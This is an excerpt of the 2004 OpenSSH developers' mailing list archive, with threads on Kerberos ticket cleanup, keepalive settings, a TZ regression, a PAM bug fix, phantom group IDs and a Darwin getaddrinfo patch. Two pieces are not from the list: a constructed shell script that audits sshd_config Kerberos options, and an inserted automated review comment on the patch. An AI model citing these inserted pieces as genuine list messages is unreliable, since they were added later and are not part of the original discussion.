Normally the ticket cache is cleaned up when the user logs out. See sshd_config
KerberosTicketCleanup yes

> I have come across the function krb5_free_principal( ). Is this the function
> that destroys the keys after the authentication is done?
>

No.

> Thanks for your answers.
>
> Regards,
> Kumar
>
> ----- Original Message -----
> From: "Kumaresh"
> To: "OpenSSH Devel List"
> Sent: Thursday, March 04, 2004 4:11 PM
> Subject: SSH + Kerberos Password auth
>
> > Hello,
> >
> > I have a question about SSH with Kerberos password authentication.
> >
> > Do I receive any host ticket to my client machine when I do ssh connection
> > with Kerberos password authentication? If don't, why?
> >
> > If I login to remote machine through telnet with Kerberos Password
> > authentication [through PAM-kerberos], then I can see the tickets with
> > klist. But with the same setup for sshd, I cannot see the tickets with
> > klist.
> >
> > Thanks,
> > Kumaresh
> >
> > ---
> > Outgoing mail is certified Virus Free.
> > Checked by AVG anti-virus system (http://www.grisoft.com).
> > Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004
> >
> > _______________________________________________
> > openssh-unix-dev mailing list
> > openssh-unix-dev at mindrot.org
> > http://www.mindrot.org/mailman/listinfo/openssh-unix-dev
> >
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.576 / Virus Database: 365 - Release Date: 1/30/2004
>
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> http://www.mindrot.org/mailman/listinfo/openssh-unix-dev

--
Douglas E. Engert
Argonne National Laboratory
9700 South Cass Avenue
Argonne, Illinois 60439
(630) 252-5444

From stuge-openssh-unix-dev at cdy.org Fri Mar 5 03:56:12 2004
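[Added example, not part of any list message and not OpenSSH code: a shell audit of sshd_config text for the two credential paths the replies above distinguish, Kerberos-validated passwords (tickets obtained on the server) versus GSSAPI ticket authentication. The sample configs and finding names are constructed; the defaults are the ones documented in sshd_config(5).]

```shell
#!/bin/sh
# Added example: report how an sshd_config obtains and cleans up Kerberos
# credentials. CFG_* samples and the finding tokens are constructed here.

# Effective global value of KEYWORD in config text CFG. Keywords are
# case-insensitive, the first value obtained wins, "key=value" is accepted,
# and the scan stops at the first Match block. DEFAULT applies when unset.
sshd_opt() {  # usage: sshd_opt CFG KEYWORD DEFAULT
    printf '%s\n' "$1" | awk -v want="$2" -v def="$3" '
        BEGIN { want = tolower(want) }
        /^[ \t]*#/ || NF == 0 { next }
        { sub(/[ \t]*=[ \t]*/, " ") }
        tolower($1) == "match" { exit }
        tolower($1) == want { print tolower($2); found = 1; exit }
        END { if (!found) print def }'
}

krb_audit() {  # usage: krb_audit CFG ; prints one finding token per line
    pw=$(sshd_opt "$1" PasswordAuthentication yes)
    krb=$(sshd_opt "$1" KerberosAuthentication no)
    gss=$(sshd_opt "$1" GSSAPIAuthentication no)
    kclean=$(sshd_opt "$1" KerberosTicketCleanup yes)
    gclean=$(sshd_opt "$1" GSSAPICleanupCredentials yes)
    hit=0
    if [ "$pw" = yes ] && [ "$krb" = yes ]; then
        # sshd receives the password and asks the KDC for tickets itself;
        # the cache lives on the server and the client holds no ticket.
        echo KRB_PASSWORD_SENT_TO_SERVER
        hit=1
        if [ "$kclean" = no ]; then echo TICKET_CACHE_KEPT_AFTER_LOGOUT; fi
    fi
    if [ "$gss" = yes ]; then
        # The client proves identity with tickets it already holds; with
        # GSSAPIDelegateCredentials in ssh_config it also forwards them.
        echo GSSAPI_TICKET_AUTH
        hit=1
        if [ "$gclean" = no ]; then echo DELEGATED_CREDS_KEPT_AFTER_LOGOUT; fi
    fi
    if [ "$hit" -eq 0 ]; then echo NO_KERBEROS_LOGIN; fi
}

CFG_PASSWORD='# constructed sample: Kerberos-validated passwords
PasswordAuthentication yes
kerberosauthentication yes
KerberosTicketCleanup no
Match User backup
    GSSAPIAuthentication yes'

CFG_GSSAPI='# constructed sample: ticket-based login only
PasswordAuthentication no
KerberosAuthentication yes
GSSAPIAuthentication=yes'

for cfg in "$CFG_PASSWORD" "$CFG_GSSAPI"; do
    krb_audit "$cfg"
    echo "--"
done
```
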
From: stuge-openssh-unix-dev at cdy.org (Peter Stuge)
Date: Thu, 4 Mar 2004 17:56:12 +0100
Subject: -R port:host:hostport - communication lost after some minutes
In-Reply-To:
References: <20040304133036.GA6958@lebarbe.net>
Message-ID: <20040304165612.GA14265@foo.birdnet.se>

On Thu, Mar 04, 2004 at 02:42:35PM +0100, Hans Schou wrote:
> > I must add that in my particular situation, joe connected to
> > "test.com" through "a lot" (at least 3) of internal networks /
> > firewalls / NAT... And that probably is the root of the problem.
>
> I had exactly the same problem with "jane", and she is sitting behind
> a different router on another location. Both joe and jane have only one
> router in my setup.
>
> I guess I can reproduce the bug within 15 minutes.

Then I'd guess your NAT firewall has a connection tracking timeout of, exactly, 15 minutes.

Use ClientAliveInterval in sshd to induce occasional traffic.

//Peter

From arise-help at pry.com Fri Mar 5 03:58:28 2004
From: arise-help at pry.com (arise-help at pry.com) Date: Thu, 04 Mar 2004 16:58:28 -0000 Subject: confirm unsubscribe from arise@pry.com Message-ID: <1078419434.2483.ezmlm@pry.com> Hi! This is the ezmlm program. I'm managing the arise at pry.com mailing list. I'm working for my owner, who can be reached at arise-owner at pry.com. To confirm that you would like openssh-unix-dev at mindrot.org removed from the arise mailing list, please send an empty reply to this address: arise-uc.1078419434.hpkjglgibocofjeobdnl-openssh-unix-dev=mindrot.org at pry.com Usually, this happens when you just hit the "reply" button. If this does not work, simply copy the address and paste it into the "To:" field of a new message. I haven't checked whether your address is currently on the mailing list. To see what address you used to subscribe, look at the messages you are receiving from the mailing list. Each message has your address hidden inside its return path; for example, mary at xdd.ff.com receives messages with return path: -mary=xdd.ff.com at pry.com. --- Administrative commands for the arise list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To subscribe to the list digest, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. 
From chlor at schou.dk Fri Mar 5 04:09:55 2004
From: chlor at schou.dk (Hans Schou)
Date: Thu, 4 Mar 2004 18:09:55 +0100 (CET)
Subject: -R port:host:hostport - communication lost after some minutes
In-Reply-To: <20040304165612.GA14265@foo.birdnet.se>
References: <20040304133036.GA6958@lebarbe.net> <20040304165612.GA14265@foo.birdnet.se>
Message-ID:

On Thu, 4 Mar 2004, Peter Stuge wrote:

> On Thu, Mar 04, 2004 at 02:42:35PM +0100, Hans Schou wrote:
...
> > I guess I can reproduce the bug within 15 minutes.
>
> Then I'd guess your NAT firewall has a connection tracking timeout
> of, exactly, 15 minutes.

Sorry. I mean that if I try to get the error, it would take me
less than 15 min to get it. Sometimes it will occur within a minute.

> Use ClientAliveInterval in sshd to induce occasional traffic.

If I don't touch the keyboard at all the connection will close down
after 60 minutes.

/hans
--
Hamletsgade 4 - 201, DK-2200 København N, Phone: +45 3582 9079
Schou Industries ApS http://schou.dk/ CVR: 26 13 44 39
--------------------------------------------------------------
Language purists want the semicolon to be used more; I am against it ;-)

From djm at mindrot.org Fri Mar 5 08:15:18 2004
From: djm at mindrot.org (Damien Miller)
Date: Fri, 5 Mar 2004 08:15:18 +1100 (EST)
Subject: -R port:host:hostport - communication lost after some minutes
In-Reply-To: <20040304165612.GA14265@foo.birdnet.se>
References: <20040304133036.GA6958@lebarbe.net> <20040304165612.GA14265@foo.birdnet.se>
Message-ID:

On Thu, 4 Mar 2004, Peter Stuge wrote:

> On Thu, Mar 04, 2004 at 02:42:35PM +0100, Hans Schou wrote:
> > I guess I can reproduce the bug within 15 minutes.
>
> Then I'd guess your NAT firewall has a connection tracking timeout of,
> exactly, 15 minutes.
>
> Use ClientAliveInterval in sshd to induce occasional traffic.

Or ServerAliveInterval in ssh (3.8+)

-d

From dtucker at zip.com.au Fri Mar 5 09:51:53 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Fri, 05 Mar 2004 09:51:53 +1100
Subject: -R port:host:hostport - communication lost after some minutes
In-Reply-To: <20040304165612.GA14265@foo.birdnet.se>
References: <20040304133036.GA6958@lebarbe.net> <20040304165612.GA14265@foo.birdnet.se>
Message-ID: <4047B309.1000403@zip.com.au>

Peter Stuge wrote:
> On Thu, Mar 04, 2004 at 02:42:35PM +0100, Hans Schou wrote:
>
>>>I must add that in my particular situation, joe connected to
>>>"test.com" through "a lot" (at least 3) of internal networks /
>>>firewalls / NAT... And that probably is the root of the problem.
[...]
>
> Then I'd guess your NAT firewall has a connection tracking timeout of,
> exactly, 15 minutes.
>
> Use ClientAliveInterval in sshd to induce occasional traffic.

OpenSSH 3.8 also added ServerAliveInterval which can be enabled on the
client side too.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From dtucker at zip.com.au Fri Mar 5 10:14:33 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Fri, 05 Mar 2004 10:14:33 +1100
Subject: SSH + Kerberos Password auth
In-Reply-To: <084f01c401d5$4af2e270$230110ac@kurco>
References: <084f01c401d5$4af2e270$230110ac@kurco>
Message-ID: <4047B859.5030607@zip.com.au>

Kumaresh wrote:
> I have a question about SSH with Kerberos password authentication.
>
> Do I receive any host ticket to my client machine when I do ssh connection
> with Kerberos password authentication? If don't, why?

Are you using the PAM Kerberos module for sshd, or did you configure
--with-kerberos5 ?

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From djm at mindrot.org Fri Mar 5 21:13:45 2004
From: djm at mindrot.org (Damien Miller)
Date: Fri, 5 Mar 2004 21:13:45 +1100 (EST)
Subject: Test - please ignore
Message-ID:

Testing a mailing list software update. Please ignore.

-d

From TORBAN at do.usbr.gov Sat Mar 6 06:34:10 2004
From: TORBAN at do.usbr.gov (Tom Orban)
Date: Fri, 05 Mar 2004 12:34:10 -0700
Subject: 3.8p1 not honoring TZ environment variable
Message-ID:

Hello,

I just built openssh 3.8p1 on an HP-UX 11i machine. All looks well
except for the timezone. I'm noticing now that when it logs stuff to
syslog, it's off by 2 hours for me. What I've figured is this:

My timezone is MST7MDT (mountain time).
The timezone in /etc/default/tz is EST5EDT (eastern time).

There's a 2 hour difference between mountain & eastern time.

What I'm thinking is the real problem, is that it is not looking at the
TZ environment variable to get its own setting for the timezone when it
starts up, and so it just uses the default in /etc/default/tz. This
behavior is definitely new to 3.8p1. I was previously running 3.7.1p2,
which did not exhibit this behavior. Of course, my workaround is to
change the value in /etc/default/tz, but it seems like it should be able
to get the right value out of the TZ environment variable.

If I'm not mistaken, sshd looks for the value of TZ with a getenv call
in session.c. Not much magic there, but it doesn't seem to be working.

Thanks.
-Tom

From djm at mindrot.org Sat Mar 6 09:25:10 2004
From: djm at mindrot.org (Damien Miller)
Date: Sat, 6 Mar 2004 09:25:10 +1100 (EST)
Subject: 3.8p1 not honoring TZ environment variable
In-Reply-To:
References:
Message-ID:

On Fri, 5 Mar 2004, Tom Orban wrote:

> Hello,
>
> I just built openssh 3.8p1 on an HP-UX 11i machine. All looks well
> except for the timezone. I'm noticing now that when it logs stuff to
> syslog, it's off by 2 hours for me. What I've figured is this:

Known problem - I believe that Darren had already committed a fix.

We should be making another portable release soon for this bug and a couple
of others.

-d

From dtucker at zip.com.au Sat Mar 6 08:39:30 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Sat, 06 Mar 2004 08:39:30 +1100
Subject: 3.8p1 not honoring TZ environment variable
In-Reply-To:
References:
Message-ID: <4048F392.9030003@zip.com.au>

Tom Orban wrote:
> Hello,
>
> I just built openssh 3.8p1 on an HP-UX 11i machine. All looks well
> except for the timezone. I'm noticing now that when it logs stuff to
> syslog, it's off by 2 hours for me. What I've figured is this:
>
> My timezone is MST7MDT (mountain time).
> The timezone in /etc/default/tz is EST5EDT (eastern time).
>
> There's a 2 hour difference between mountain & eastern time.
>
> What I'm thinking is the real problem, is that it is not looking at the
> TZ environment variable to get its own setting for the timezone when it
> starts up, and so it just uses the default in /etc/default/tz. This
> behavior is definitely new to 3.8p1. I was previously running 3.7.1p2,
> which did not exhibit this behavior. Of course, my workaround is to
> change the value in /etc/default/tz, but it seems like it should be able
> to get the right value out of the TZ environment variable.
>
> If I'm not mistaken, sshd looks for the value of TZ with a getenv call
> in session.c. Not much magic there, but it doesn't seem to be working.

In 3.8p1 sshd clears its environment at startup. You can disable this
by deleting these lines from sshd.c:

    /* Clear environment */
    environ[0] = NULL;

That will probably be changed for the next release.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From dtucker at zip.com.au Sat Mar 6 09:42:10 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Sat, 06 Mar 2004 09:42:10 +1100
Subject: 3.8p1 not honoring TZ environment variable
In-Reply-To:
References:
Message-ID: <40490242.1080804@zip.com.au>

Damien Miller wrote:
[TZ variable]
> Known problem - I believe that Darren had already committed a fix.

No, I haven't committed the fix yet. I'll do it in the next day or so.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From dtucker at zip.com.au Sat Mar 6 17:57:02 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Sat, 06 Mar 2004 17:57:02 +1100
Subject: [Bug 808] segfault if not using pam/keyboard-interactive mech and password's expired
Message-ID: <4049763E.8090406@zip.com.au>

bugzilla-daemon at mindrot.org wrote:
>Summary: segfault if not using pam/keyboard-interactive mech and
> password's expired

I'm sorry to report that there is a bug in the PAM code in OpenSSH
3.8p1, and sorrier to say that I put it there.

This is a NULL pointer dereference and is *not* considered to be a
security vulnerability.

When sshd is configured --with-pam, run with UsePAM=yes, and a user with
an expired password successfully authenticates via a method other than
keyboard-interactive without trying keyboard-interactive first, sshd
will attempt to dereference a NULL pointer and segfault.

In such a case, the user's session will be immediately terminated. If
UsePAM=no (the default), this problem will not occur.

The attached patch fixes this. Please test it, we would like to release
a 3.8p2 soon containing this and a few other fixes.

My apologies to anyone inconvenienced by this.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: openssh-pam-authctxt.patch
Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040306/48aad78d/attachment.ksh

From schulz at videotron.ca Sun Mar 7 14:10:24 2004
From: schulz at videotron.ca (Martin Schulz)
Date: Sat, 06 Mar 2004 22:10:24 -0500
Subject: extra groups passed by openssh - security issue?
Message-ID: <404A92A0.8030101@videotron.ca>

I would appreciate your opinion on a problem with sshd on Linux,
when running under daemontools supervise.
The configuration:
sshd version OpenSSH_3.7.1p2
Redhat Linux 2.4.20-8smp #1 SMP i686
supervise / daemontools-0.76

I see the following behavior regarding groups:
-bash-2.05b$ ssh mschulz at localhost id -Gn
id: cannot find name for group ID 201
id: cannot find name for group ID 2039
OA3 201 2039

The group my account belongs to is OA3, groups 201 and 2039 do not exist.
(a normal login or su, and 'id -Gn' works as expected)

It turns out that when I run sshd standalone (debug), it works fine -
only when run under the supervise command I see the strange extra groups.

This is not related to SSH privilege separation, the install is correct
and works fine with respect to the sshd privilege separation user. (I've
looked through the strace output).

Between different user accounts, the problem occurs often with the exact
same behavior,
but for some there is only one different extra group ID, or none at all.

Is this a known problem? Can anyone confirm it?

Looking at the source, it appears that great care is taken to _remove_
all extra groups before starting subprocesses, and indeed if I look at the
exact same configuration on Solaris 8, there are no extra groups.

Is this a compile option problem? I have #define HAVE_SETGROUPS 1
and everything looks proper to me.

Am I looking at a bug or two? Is there some unit testing code for the
uid and privilege switching code I could run?
Any simple things I should try with supervise?

I am anxious to exclude any security issues related to this issue.
I am relatively reluctant to 'experiment' on this box, as it is our
company's main CVS server, making use of groups to control write access.

Thanks a lot.
Martin

From dtucker at zip.com.au Sun Mar 7 18:59:39 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Sun, 07 Mar 2004 18:59:39 +1100
Subject: extra groups passed by openssh - security issue?
In-Reply-To: <404A92A0.8030101@videotron.ca>
References: <404A92A0.8030101@videotron.ca>
Message-ID: <404AD66B.2030707@zip.com.au>

Hi.
I installed daemontools-0.76 and was not able to reproduce this on my
box with OpenSSH 3.7.1p2 (RH9, 1 cpu, kernel 2.4.20-30.9).

Martin Schulz wrote:
> I would appreciate your opinion on a problem with sshd on Linux,
> when running under daemontools supervise.
> The configuration:
> sshd version OpenSSH_3.7.1p2
> Redhat Linux 2.4.20-8smp #1 SMP i686
> supervise / daemontools-0.76

More information is needed:
Did you compile OpenSSH yourself, and if so with what options? In
particular, are you using PAM?
What's your account database (eg do you use NIS?)
Which Redhat release and have any patches been applied?
What is the glibc version?
What does the script starting sshd contain?

> I see the following behavior regarding groups:
> -bash-2.05b$ ssh mschulz at localhost id -Gn
> id: cannot find name for group ID 201
> id: cannot find name for group ID 2039
> OA3 201 2039
>
> The group my account belongs to is OA3, groups 201 and 2039 do not exist..
> (a normal login or su, and 'id -Gn' works as expected)

What about running, eg, inetd/telnetd under daemontools?

> It turns out that when I run sshd standalone (debug), it works fine -
> only when run under the supervise command I see the strange extra groups.

To clarify: running sshd as a stand-alone daemon (ie "sshd" with no
options) *and* with debugging (ie "sshd -ddd") both work correctly?

> This is not related to SSH privilege separation, the install is correct
> and works fine with respect to the sshd privilege separation user. (I've
> looked through the strace output).
>
> Between different user accounts, the problem occurs often with the exact
> same behavior,
> but for some there is only one different extra group ID, or none at all.

You always get the same behaviour with the same accounts? What do the
users exhibiting these symptoms have in common? Do those groups exist
in /etc/group or the gid field of /etc/passwd?

> Is this a known problem?

Not that I know of.

[...]

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
    Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From rouilj at cs.umb.edu Mon Mar 8 02:42:59 2004
From: rouilj at cs.umb.edu (John P. Rouillard)
Date: Sun, 07 Mar 2004 10:42:59 -0500
Subject: environ problem in 3.8p1
In-Reply-To: Your message of "Wed, 03 Mar 2004 12:44:43 +1100." <4045388B.4090804@zip.com.au>
Message-ID: <200403071542.i27FgxNh023809@mx1.cs.umb.edu>

In message <4045388B.4090804 at zip.com.au>, Darren Tucker writes:
>Damien Miller wrote:
>
>> Actually, this won't work - KRB5CCNAME gets set during the auth process.
>>
>> Perhaps we just need to blank a couple of environment variables. Comments?
>
>Yes, that seems safer. I had a patch somewhere that had configure check
>for unsetenv() and emulate it in openbsd-compat if not found (probably
>attached to the original bug #757).

Sorry if this has already been suggested, but I am only up to Tuesday
in my email backlog.

I would suggest not blanking "a couple of environment variables", but
passing only the environment variables you need and
blanking/removing all the rest. It's just safer since you never know
what variables could be used for an exploit later.

-- rouilj
John Rouillard
===========================================================================
My employers don't acknowledge my existence much less my opinions.

From Sergio.Gelato at astro.su.se Mon Mar 8 04:28:39 2004
From: Sergio.Gelato at astro.su.se (Sergio Gelato) Date: Sun, 7 Mar 2004 18:28:39 +0100 Subject: Mac OS X BROKEN_GETADDRINFO detection patch In-Reply-To: References: Message-ID: <20040307172839.GA23286@astro.su.se> * Damien Miller [2004-03-06 09:25:10 +1100]: > We should be making another portable release soon for this bug and a couple > of others. I guess I should submit the following patch now rather than later, then. Improves detection of broken getaddrinfo() on Mac OS X. Still not as comprehensive as one might wish, but detects the one extant bug I'm aware of in that platform's getaddrinfo(). Among the features broken by this bug is the ability to use non-numeric hostnames in from= clauses in the authorized_keys file. Note, however, that since getaddrinfo is in a dynamic library there is no guarantee that the version available to sshd at run time will be as bug-free as the one it was built against. It may therefore be safer to define BROKEN_GETADDRINFO unconditionally on this platform. I'd love to report the underlying issues to Apple, but the only channel I've found that might work (the feedback form didn't) involves a vaguely NDA-like piece of legalese which I have no wish to touch. If anyone else knows a better way (or has already signed that contract), let me know. --- orig/configure.ac +++ mod/configure.ac @@ -142,10 +142,19 @@ *-*-darwin*) AC_MSG_CHECKING(if we have working getaddrinfo) AC_TRY_RUN([#include -main() { if (NSVersionOfRunTimeLibrary("System") >= (60 << 16)) - exit(0); - else +#include +#include +#include +main() { + struct addrinfo hints, *ai; + if (NSVersionOfRunTimeLibrary("System") < (60 << 16)) exit(1); + memset(&hints,0,sizeof(hints)); + hints.ai_family = PF_UNSPEC; + hints.ai_flags = AI_NUMERICHOST; + if (getaddrinfo("localhost","0",&hints,&ai) != EAI_NONAME) + exit(2); + exit(0); }], [AC_MSG_RESULT(working)], [AC_MSG_RESULT(buggy) AC_DEFINE(BROKEN_GETADDRINFO)], From schulz at videotron.ca Mon Mar 8 06:08:41 2004 
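Review bot: the new test program inside AC_TRY_RUN has no comment saying which getaddrinfo() defect it probes for, and its two failure exits (exit(1) for a System library older than 60 << 16, exit(2) when the AI_NUMERICHOST lookup of "localhost" does not return EAI_NONAME) both collapse into the same "buggy" result. A short comment above the probe stating the expected behaviour (a non-numeric name with AI_NUMERICHOST must fail with EAI_NONAME) would let a later reader judge whether the check is still needed. Since the probe only runs on the build host, it cannot cover the run-time library concern raised in the accompanying message, so the comment should also say why BROKEN_GETADDRINFO is not simply defined unconditionally for *-*-darwin*.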
From: schulz at videotron.ca (Martin Schulz)
Date: Sun, 07 Mar 2004 14:08:41 -0500
Subject: extra groups passed by openssh - security issue?
In-Reply-To: <404AD66B.2030707@zip.com.au>
References: <404A92A0.8030101@videotron.ca> <404AD66B.2030707@zip.com.au>
Message-ID: <404B7339.6000902@videotron.ca>

Darren,

thanks for trying to rep this. See my replies below. From what you say the best option might be to 'upgrade away' these symptoms. I'll discuss trying out 3.8 and/or an upgraded Linux. Might also start trying this on a variety of Linux versions.

As far as we are concerned, it's only a minor annoyance. What worries me is any security implications this might have in general, however this will be limited to group level privs.

Darren Tucker wrote:
> Hi.
> I installed daemontools-0.76 and was not able to reproduce this on
> my box with OpenSSH 3.7.1p2 (RH9, 1 cpu, kernel 2.4.20-30.9).
>
> Martin Schulz wrote:
>
>> I would appreciate your opinion on a problem with sshd on Linux,
>> when running under daemontools supervise.
>> The configuration:
>> sshd version OpenSSH_3.7.1p2
>> Redhat Linux 2.4.20-8smp #1 SMP i686
>> supervise / daemontools-0.76
>
> More information is needed:
> Did you compile OpenSSH yourself, and if so with what options?

Yes, ie. not me, but manually:
$ ./configure --prefix=/usr/local --with-ssl-dir=/usr/local/

> In particular, are you using PAM?

Yes

> What's your account database (eg do you use NIS?)

files only - strace looks sensible, except that getgroups32 returns the extra groups. (aliases / publickey use NIS+ also)

> Which Redhat release and have any patches been applied?

I think it's RH 8, unpatched. Will check.

> What is the glibc version?

libc-2.3.2.so

> What does the script starting sshd contain?

#!/bin/bash
exec /usr/local/sbin/sshd -D

>> I see the following behavior regarding groups:
>> -bash-2.05b$ ssh mschulz@localhost id -Gn
>> id: cannot find name for group ID 201
>> id: cannot find name for group ID 2039
>> OA3 201 2039
>
>> The group my account belongs to is OA3, groups 201 and 2039 do not
>> exist..
>> (a normal login or su, and 'id -Gn' works as expected)
>
> What about running, eg, inetd/telnetd under daemontools?

Good point, however the box is supposed to be secure, but I'll try to get that checked. What I did right now is adding a line 'id -Gn >>/tmp/sshd_supervise_id.log' to the sshd run script. Then killed sshd, and I'm getting simply 'root', not even the other groups root belongs to. Similarly, putting various id commands under 'supervise' control, did not result in any extra groups. That was unexpected, I was fully expecting the extra groups coming from 'somewhere'. I'll google for a kernel bug... I've also tried variations of invoking su, never got anything different but the real groups back.

>> It turns out that when I run sshd standalone (debug), it works fine -
>> only when run under the supervise command I see the strange extra
>> groups.
>
> To clarify: running sshd as a stand-alone daemon (ie "sshd" with no
> options) *and* with debugging (ie "sshd -ddd") both work correctly?

yes. It worked fine before put under supervise. I tried -ddd and no problem either.

>> This is not related to SSH privilege separation, the install is
>> correct and works fine with respect to the sshd privilege separation
>> user. (I've
>
> looked through the strace output).
>
>>
>> Between different user accounts, the problem occurs often with the
>> exact same behavior,
>> but for some there is only one different extra group ID, or none at all.
>
> You always get the same behaviour with the same accounts? What do the
> users exhibiting these symptoms have in common? Do those groups exist
> in /etc/group or the gid field of /etc/passwd?

I haven't found a good pattern for that. The additional groups are 'sticky', but I'll have to restart sshd during the week to see whether that will change anything. No, these groups don't exist (if they did, we might not have noticed this in the first place!). Not in /etc/group or /etc/passwd. Furthermore several accounts get the same extra groups (201, 2039), root gets a single extra group 200.

>> Is this a known problem?
>
> Not that I know of.
>
> [...]
>

Thanks again.
Martin

From dtucker at zip.com.au Mon Mar 8 21:41:57 2004
From: dtucker at zip.com.au (Darren Tucker)
Date: Mon, 08 Mar 2004 21:41:57 +1100
Subject: environ problem in 3.8p1
In-Reply-To: <200403071542.i27FgxNh023809@mx1.cs.umb.edu>
References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu>
Message-ID: <404C4DF5.7000800@zip.com.au>

John P. Rouillard wrote:
> I would suggest not blanking "a couple of environment variables", but
> passing only the environment variables you need and
> blanking/removing all the rest.

At the moment, only specific environment variables are copied from the daemon's environment to the child's. KRB5CCNAME is an odd case because on AIX it might be set by the auth process itself, and the issue is if it's set in root's environment but not overridden during the login process.

> It's just safer since you never know
> what variables could be used for an exploit later.

The environment variables in question are those inherited from root's environment at daemon startup, users don't get to fiddle with them.

--
Darren Tucker (dtucker at zip.com.au)
GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69
Good judgement comes with experience. Unfortunately, the experience
usually comes from bad judgement.

From v_t_m at seznam.cz Tue Mar 9 06:05:50 2004
From: v_t_m at seznam.cz (Václav Tomec)
Date: Mon, 08 Mar 2004 20:05:50 +0100 (CET)
Subject: PATCH: scp logging
Message-ID: <1288782.2680911-11373-434515956-1078772750@seznam.cz>

Hello all,

find attached a small patch for scp logging, I hope it might come in handy to some of you.

Vaclav

-------------- next part --------------
A non-text attachment was scrubbed...
Name: scp_log.patch.gz
Type: application/gzip
Size: 1413 bytes
Desc: not available
Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040308/37cb4677/attachment.bin

From schulz at videotron.ca Tue Mar 9 11:47:31 2004
From: schulz at videotron.ca (Martin Schulz)
Date: Mon, 08 Mar 2004 19:47:31 -0500
Subject: extra groups passed by openssh - security issue?
In-Reply-To: <404AD66B.2030707@zip.com.au>
References: <404A92A0.8030101@videotron.ca> <404AD66B.2030707@zip.com.au>
Message-ID: <404D1423.8000306@videotron.ca>

The issue disappeared as mysteriously as it showed up. After restarting the supervise process itself we are unable to reproduce the scenario.

Thanks to everyone.

Darren Tucker wrote:
> Hi.
> I installed daemontools-0.76 and was not able to reproduce this on
> my box with OpenSSH 3.7.1p2 (RH9, 1 cpu, kernel 2.4.20-30.9).
>
> Martin Schulz wrote:
>
>> I would appreciate your opinion on a problem with sshd on Linux,
>> when running under daemontools supervise.
>> The configuration:
>> sshd version OpenSSH_3.7.1p2
>> Redhat Linux 2.4.20-8smp #1 SMP i686
>> supervise / daemontools-0.76
>
> More information is needed:
> Did you compile OpenSSH yourself, and if so with what options?
> In particular, are you using PAM?
> What's your account database (eg do you use NIS?)
> Which Redhat release and have any patches been applied?
> What is the glibc version?
> What does the script starting sshd contain?
>
>> I see the following behavior regarding groups:
>> -bash-2.05b$ ssh mschulz@localhost id -Gn
>> id: cannot find name for group ID 201
>> id: cannot find name for group ID 2039
>> OA3 201 2039
>
>> The group my account belongs to is OA3, groups 201 and 2039 do not
>> exist..
>> (a normal login or su, and 'id -Gn' works as expected)
>
> What about running, eg, inetd/telnetd under daemontools?
>
>> It turns out that when I run sshd standalone (debug), it works fine -
>> only when run under the supervise command I see the strange extra
>> groups.
>
> To clarify: running sshd as a stand-alone daemon (ie "sshd" with no
> options) *and* with debugging (ie "sshd -ddd") both work correctly?
>
>> This is not related to SSH privilege separation, the install is
>> correct and works fine with respect to the sshd privilege separation
>> user. (I've
>
> looked through the strace output).
>
>>
>> Between different user accounts, the problem occurs often with the
>> exact same behavior,
>> but for some there is only one different extra group ID, or none at all.
>
> You always get the same behaviour with the same accounts? What do the
> users exhibiting these symptoms have in common? Do those groups exist
> in /etc/group or the gid field of /etc/passwd?
>
>> Is this a known problem?
>
> Not that I know of.
>
> [...]
>

From postadal at suse.cz Tue Mar 9 02:21:08 2004
From: postadal at suse.cz (Petr Ostadal)
Date: Mon, 8 Mar 2004 16:21:08 +0100 (CET)
Subject: environ problem in 3.8p1
In-Reply-To: <404C4DF5.7000800@zip.com.au>
References: <200403071542.i27FgxNh023809@mx1.cs.umb.edu> <404C4DF5.7000800@zip.com.au>
Message-ID:

Is there any safe way to forward LANG and LC_* environ variables from client to remote? I have a problem with utf8<->not utf8 terminals ;(.

Petr

On Mon, 8 Mar 2004, Darren Tucker wrote:

> John P. Rouillard wrote:
> > I would suggest not blanking "a couple of environment variables", but
> > passing only the environment variables you need and
> > blanking/removing all the rest.
>
> At the moment, only specific environment variables are copied from the
> daemon's environment to the child's. KRB5CCNAME is an odd case because
> on AIX it might be set by the auth process itself, and the issue is if
> it's set in root's environment but not overridden during the login process.
>
